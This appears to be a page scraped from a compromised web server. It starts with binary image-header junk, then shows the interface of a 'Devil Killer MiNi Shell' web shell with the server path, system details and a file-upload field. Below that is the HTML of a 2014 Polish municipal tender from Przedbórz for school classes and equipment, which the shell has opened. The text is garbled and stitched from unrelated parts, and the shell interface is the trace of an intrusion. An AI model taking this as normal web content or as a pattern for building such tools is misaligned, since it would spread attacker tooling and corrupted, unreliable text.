JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140818/176619-N-2014.html

<p class="kh_header"><b>Przedbórz: Świadczenie usługi edukacyjnej - usługa niepriorytetowa, wraz z dostawami w projekcie Nowa jakość nauczania w szkołach w Gminie Przedbórz</b><br>
<b>Numer ogłoszenia: 176619 - 2014; data zamieszczenia: 18.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Przedbórz , ul. Mostowa 29, 97-570 Przedbórz, woj. łódzkie, tel. 044 7812261 do 65, faks 044 7812180.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedborz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej - usługa niepriorytetowa, wraz z dostawami w projekcie Nowa jakość nauczania w szkołach w Gminie Przedbórz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1	Przedmiot zamówienia jest świadczeniem usługi niepriorytetowej (edukacyjnej).

Projekt Nowa jakość nauczania w szkołach w Gminie Przedbórz realizowany jest przy współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki  na lata 2007-2013 Priorytet 9, Działanie 9.1., Poddziałanie 9.1.2.

Zajęcia oparte zostaną o zasadę równości szans kobiet i mężczyzn w życiu społecznym - do programu zajęć zostaną wprowadzone metody niwelujące stereotypy. 
Zamawiający zastrzega, że osoba prowadząca zajęcia musi posiadać wykształcenie kierunkowe a także wiedzę teoretyczną właściwą dla tematyki prowadzonych przez niego zajęć dodatkowych. Ponadto Zamawiający zastrzega, że Wykonawca musi podać, co najmniej jedną osobę prowadzącą zajęcia dla każdego rodzaju zajęć (21 rodzajów zajęć). 

2.2	W skład przedmiotu zamówienia wchodzi organizacja i przeprowadzenie usług edukacyjnych jak niżej: 

Gimnazjum w Przedborzu
a)	 Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: dziennikarskie, teatralne
-	Ilość godzin - 360h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 4
-	1h lekcyjna - 45 min.

b)	Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: język angielski
-	Ilość godzin - 180h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 2.
-	1h lekcyjna - 45  min.

c)	Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: język niemiecki
-	Ilość godzin - 360h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 4
-	1h lekcyjna - 45  min.

d)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: język polski
-	Ilość godzin - 450h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 5.
-	1h lekcyjna - 45  min.

e)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: matematyka
-	Ilość godzin - 450 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 5.
-	1h lekcyjna - 45  min.

f)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: j. angielski
-	Ilość godzin - 450 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 5.
-	1h lekcyjna - 45  min.

g)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: język niemiecki
-	Ilość godzin - 450 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 5.
-	1h lekcyjna - 45  min.

h)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: fizyka
-	Ilość godzin - 450 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 5.
-	1h lekcyjna - 45  min.

i)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: chemia
-	Ilość godzin - 450 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 5.
-	1h lekcyjna - 45  min.

j)	Zakup usługi edukacyjnej - zajęcia specjalistyczne: gimnastyka korekcyjna / zaj. sportowe
-	Ilość godzin - 180 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 2.
-	1h lekcyjna - 45  min.

k)	Zakup usługi edukacyjnej - zajęcia specjalistyczne: zajęcia psychologiczno-pedagogiczne
-	Ilość godzin - 360h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 4.
-	1h lekcyjna - 45  min.

l)	Zakup usługi edukacyjnej - zajęcia specjalistyczne logopedyczne
-	Ilość godzin - 180 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 2.
-	1h lekcyjna - 45  min.

Szkoła Podstawowa w Górach Mokrych

a)  Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: język polski
-	Ilość godzin - 360h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 4
-	1h lekcyjna - 45 min.
 
b) Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: informatyka
-	Ilość godzin - 360h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 4
-	1h lekcyjna - 45 min.

 c)  Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: język angielski
-	Ilość godzin - 180h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 2
-	1h lekcyjna - 45 min.

d)	Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: matematyczno-przyrodnicze
-	Ilość godzin - 270h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 3
-	1h lekcyjna - 45 min.

e)  Zakup usługi edukacyjnej - zajęcia dodatkowe ukierunkowane na rozwój kompetencji kluczowych: matematyka
-	Ilość godzin - 90h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 1
-	1h lekcyjna - 45 min.

f)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: język polski
-	Ilość godzin - 180 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 2
-	1h lekcyjna - 45  min.

g)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: matematyka
-	Ilość godzin -90 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 1
-	1h lekcyjna - 45  min.

h)	Zakup usługi edukacyjnej - zajęcia wyrównawcze: język angielski
-	Ilość godzin - 180h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 2
-	1h lekcyjna - 45  min.

i)	Zakup usługi edukacyjnej - zajęcia specjalistyczne: gimnastyka korekcyjna / zaj. sportowe
-	Ilość godzin - 180 h lekcyjnych łącznie dla wszystkich grup,
-	Ilość grup - 2.
-	1h lekcyjna - 45  min.


Przy czym:

-	Wykonawca poinformuje przedstawiciela Zamawiającego po podpisaniu umowy (na piśmie) o autorskim programie i koncepcji przeprowadzenia zajęć. 
-	Wykonawca zobowiązany będzie uzyskać zaopiniowanie programu zajęć przez przedstawiciela Zamawiającego. W przypadku uwag Zamawiającego zobowiązany będzie skorygować program zgodnie z zaleceniami Zamawiającego 
-	Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu Harmonogramu świadczenia usługi.
-	Zajęcia odbywać się będą w okresie od daty podpisania umowy do 30 czerwca 2015 r. - zgodnie z harmonogramem projektu i z przerwami w realizacji usługi tam przewidzianymi. 
-	Wykonawca zobowiązany będzie do zapewnienia ciągłości zajęć 
-	Wszystkie dokumenty powinny być opatrzone znakami identyfikacji wizualnej projektu wg wzoru:

 
Projekt współfinansowany ze środków Unii Europejskiej
w ramach Europejskiego Funduszu Społecznego


Ponadto w ramach realizacji zamówienia wykonawca zobowiązany jest zrealizować dostawy służące wykonaniu zamówienia (doposażenie bazy dydaktycznej), w zakresie jn. (każdy element dostawy ma być nowy. Zamawiający wyklucza dostawę elementów używanych) dla:

Gimnazjum w Przedborzu

1.Tablica interaktywna 2 szt.- o parametrach nie gorszych niż: 
- powierzchnia tablicy - suchościeralna,  magnetyczna odporna na uszkodzenia ; 
- przekątna tablicy - 88cali, 
- technologia - pozycjonowanie w podczerwieni
- sposób obsługi - pióro bez konieczności stosowania baterii, palec lub dowolny wskaźnik
- format obrazu - 4:3
- komunikacja - USB
- system operacyjny - Windows 2000/XP/Vista/7 32 bit i 64 bit
- zasilanie - Port USB
- język oprogramowania - Język polski
2. Laptop 2 szt.- o parametrach nie gorszych niż : 
            -system operacyjny Windows 8 , 
 	- wersja językowa -  polski  
	- procesor AMD A-Series A8-5550M 2,1 - 3,1 GHz  
- liczba rdzeni  4
- pamięć podręczna CACHE 4 MB , 
- ekran 15,6cali, WXGA 1366 x 768 pikseli, 
- rodzaj napędu Super Multi DVD+/-, wyjścia / wejścia,  Złącze USB 2.0 1,  Złącze USB 3.0 2,   Wymiary (wys. x szer. x gł.)  26 x 380 x 260 mm  Maksymalny czas pracy  4 h,  
3. Projektor multimedialny 2 szt.-  o parametrach nie gorszych niż:
      - rozdzielczość: XGA (1024 x 768) - SVGA (800 x 600) - VGA - Full HD (1920 x  
       1080) - HD Ready - UXGA (1600 x 1200) 
     - głośność pracy: 33 dB - 30 dB - 26 dB 
     - połączenie: S-Video | 3D: 3D
     - oszczędność energii
4. urządzenie wielofunkcyjne - drukarka, kserokopiarka 1 szt. - o parametrach nie gorszych niż: drukarka - prędkość druku - czerń [str/min] 33, języki drukarki: PCL 5e; PCL 6; PDF 1.7, marginesy: 5 mm (lewy; prawy; góra; dół); automatyczny druk dwustronny; kopiarka - prędkość druku - czerń [str/min] 33, języki drukarki: PCL 5e; PCL 6; PDF 1.7 Zmniejszanie/powiększanie [%]25 - 400, funkcje kopiowania Druk N-stron na arkusz: 4, skaner
5. aparat fotograficzny 1 szt. - o parametrach nie gorszych niż:
-rozdzielczość 16 mln pikseli; duży 3 calowy ekran LCD; układy optycznej stabilizacji obrazu, możliwość nagrywania filmów w rozdzielczości HD (720p), ogniskowa 28 mm; ręczne ustawianie ekspozycji; technologia automatycznego wykrywania twarzy;  wyjście mini HDMI; 16 krotne zbliżenie.
6. mikroskop wraz z zestawem preparatów- 4 szt.  o parametrach nie mniejszych niż:
- podwójne, wbudowane oświetlenie LED; obraz o wysokiej jakości: okulary, obiektywy i wszystkie pozostałe elementy optyczne pokryte wielowarstwową powłoką; mechanizm ustawiania ostrości oraz stolik poruszają się płynnie, bez luzów i szarpnięć; maksymalne; zasilanie sieciowe 220 V AC, 
7. stacja meteorologiczna - 1 szt. wyposażona w Pomiar wilgotności z zakres wilgotności 25% - 95%, dokładność 1%;  pomiar temperatur pomiar temperatury na zewnątrz oraz wewnątrz, w Celsjuszach lub Fahrenheitach.; Jednostka główna pomiar  w zakresie -5C - 50C (23F - 122F), dokładność 0,1C (0,2F); Czujnik zewnętrzny THGN132N mierzy w zakresie -20C - 60C (-4F - 140F), dokładność 0,1C (0,2F). Prognoza pogody na 12-24 godziny wprzód, w obszarze o promieniu 30-50 km, z dokładnością wynoszącą 75%; Zegar i dzień tygodnia; Wyświetlacz - podświetlany LCD., Wymiary i waga jednostka główna - 94 x 51 x 182,5 mm (dł. x szer. x wys.), 241 g (bez baterii); czujnik zewnętrzny THGN132N - 50 x 22 x 96 mm (dł. x szer. x wys.), 62 g (bez baterii); Zasilanie Jednostka główna - 3 x AA 1,5V (bateria w zestawie), czujnik zewnętrzny THGN132N - 1 x AA 1,5 (bateria w zestawie)
Szkoły Podstawowej w Górach Mokrych
1. Laptopy - 4 szt. o parametrach nie gorszych niż : 
            -system operacyjny Windows 8 , 
 	- wersja językowa -  polski  
	- procesor AMDR A-Series A8-5550M 2,1 - 3,1 GHz  
- liczba rdzeni  4
- pamięć podręczna CACHE 4 MB , 
- ekran 15,6cali, WXGA 1366 x 768 pikseli, 
- rodzaj napędu Super Multi DVD+/-, wyjścia / wejścia,  Złącze USB 2.0 1,  Złącze USB 3.0 2,   Wymiary (wys. x szer. x gł.)  26 x 380 x 260 mm  Maksymalny czas pracy  4 h,  
2. Projektory multimedialne - 4 szt. o parametrach nie gorszych niż:
      - rozdzielczość: XGA (1024 x 768) - SVGA (800 x 600) - VGA - Full HD (1920 x  
       1080) - HD Ready - UXGA (1600 x 1200) 
     - głośność pracy: 33 dB - 30 dB - 26 dB 
     - połączenie: S-Video | 3D: 3D
     - oszczędność energii.
3.  Tablica interaktywna - 1 szt. - o parametrach nie gorszych niż: 
- powierzchnia tablicy - suchościeralna,  magnetyczna odporna na uszkodzenia ; 
- przekątna tablicy - 88cali, 
- technologia - pozycjonowanie w podczerwieni
- sposób obsługi - pióro bez konieczności stosowania baterii, palec lub dowolny wskaźnik
- format obrazu - 4:3
- komunikacja - USB
- system operacyjny - Windows 2000/XP/Vista/7 32 bit i 64 bit
- zasilanie - Port USB
- język oprogramowania - Język polski

4. Słownik polsko- angielski - 10 szt. 

5. Słownik poprawnej polszczyzny - 5 szt
6. Plansze dydaktyczne - 2 zestawy  -  plansze dydaktyczne pomocne podczas nauki  w szkole podstawowej. Zestaw powinien składać się z  co najmniej 5 ofoliowanych wyposażonych w zawieszkę i listwy metalowe plansz o wymiarach 70cm x 100cm. 

Inwestycja realizowana przy współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje, zgodnie z art. 67 ust. 1 pkt 6 ustawy, możliwość udzielenia zamówień uzupełniających - do 50 % wartości  zamówienia podstawowego. Zgodnie z tym przepisem, Zamawiający może udzielić zamówienia z wolnej ręki przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę edukacyjną świadczoną na rzecz dzieci lub młodzieży szkolnej o charakterze edukacyjno-szkoleniowym, a jej wartość nie może być mniejsza niż 100 000 zł brutto oraz dostawę pomocy dydaktycznych związaną z realizacją zajęć edukacyjnych dla dzieci lub młodzieży szkolnej na kwotę nie niższą niż 20 tys. zł.
Na potwierdzenie spełniania w/w warunku udziału w postępowaniu Wykonawca zobowiązany jest przedstawić wykaz wykonanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie
a)	dowodami, o których mowa w pkt powyżej, są: 
-	poświadczenie
-	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w tirecie pierwszym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznany będzie za spełniony jeżeli Wykonawca wykaże że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia: 
minimum po jednej osobie* posiadającej wykształcenie kierunkowe i teoretyczne przygotowanie dla poszczególnego rodzaju zajęć;
zgodnie z kwalifikacjami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz. U. z 2009r., Nr 50 poz. 400), w sprawie szczegółowych
 kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli,
*uprawnień nie można łączyć - wykonawca zobowiązany jest do wskazania różnych osób dla poszczególnych rodzajów zadań

Na potwierdzenie spełniania w/w warunku udziału w postępowaniu Wykonawca zobowiązany jest przedstawić:
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z załącznikiem nr 5 do siwz).
- oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, (zgodnie z załącznikiem nr 5a do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznany będzie za spełniony jeżeli Wykonawca wykaże że posiada środki finansowe na rachunku lub zdolność kredytową w wysokości nie mniejszej niż 100 000,00 zł.
Na potwierdzenie spełniania w/w warunku udziału w postępowaniu Wykonawca zobowiązany jest przedstawić informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej w których wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (załącznik nr 8 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę edukacyjną świadczoną na rzecz dzieci lub młodzieży szkolnej o charakterze edukacyjno-szkoleniowym, a jej wartość nie może być mniejsza niż 100 000 zł brutto oraz dostawę pomocy dydaktycznych związaną z realizacją zajęć edukacyjnych dla dzieci lub młodzieży szkolnej na kwotę nie niższą niż 20 tys. zł;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
